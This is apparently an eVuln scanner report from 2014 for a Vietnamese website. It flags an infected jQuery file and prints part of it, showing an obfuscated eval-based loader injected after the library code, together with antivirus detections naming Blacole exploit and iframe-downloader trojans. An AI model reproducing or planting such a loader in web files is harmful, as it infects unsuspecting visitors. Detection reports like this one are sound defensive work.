New scan:

Malware Scanner report for cuanhualoithep.com.vn

Malicious/Suspicious/Total urls checked
1/0/6
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cuanhualoithep.com.vn/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Sep 2014 17:29:14 GMT
Location: http://www.cuanhualoithep.com.vn/
Server: Apache/2
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cuanhualoithep.com.vn/
200 OK
Content-Length: 16732
Content-Type: text/html
clean
http://www.cuanhualoithep.com.vn/files/javascripts/jquery-1.2.6.min.js
200 OK
Content-Length: 62033
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]|
... 3071 bytes are skipped ...
Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq6dZq6fZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tmvj]("Zq");}wvjrl=hfkyjf;jyo=[];for(shxst=22-20-2;-shxst+1387!=0;shxst+=1){yvv=shxst;if((0x19==031))jyo+=zwyq.fromCharCode(eval(kgqxkn+wvjrl[1*yvv])+0xa-avr);}kin=eval;if(Math.ceil(5.5)===6)kin(jyo)}
/*/a9a007*/*/

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
Trojan.Script.503932
Emsisoft
Trojan.Script.503932 (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
Trojan.Script.503932
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
Commtouch
JS/IFrame.RS
BitDefender
Trojan.Script.503932

http://cuanhualoithep.com.vn/ymsgr:sendim?phuongnam_plc
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Sep 2014 17:29:20 GMT
Location: http://www.cuanhualoithep.com.vn/ymsgr:sendim?phuongnam_plc
Server: Apache/2
Content-Length: 340
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cuanhualoithep.com.vn/ymsgr:sendim?phuongnam_plc
404 Not Found
Content-Length: 386
Content-Type: text/html
clean
http://www.cuanhualoithep.com.vn/test404page.js
404 Not Found
Content-Length: 374
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cuanhualoithep.com.vn

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Sep 2014 17:29:14 GMT
Location: http://www.cuanhualoithep.com.vn/
Server: Apache/2
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1

...314 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cuanhualoithep.com.vn
Referer: http://www.google.com/search?q=cuanhualoithep.com.vn

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cuanhualoithep.com.vn

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cuanhualoithep.com.vn/

Result: cuanhualoithep.com.vn is not infected or malware details are not published yet.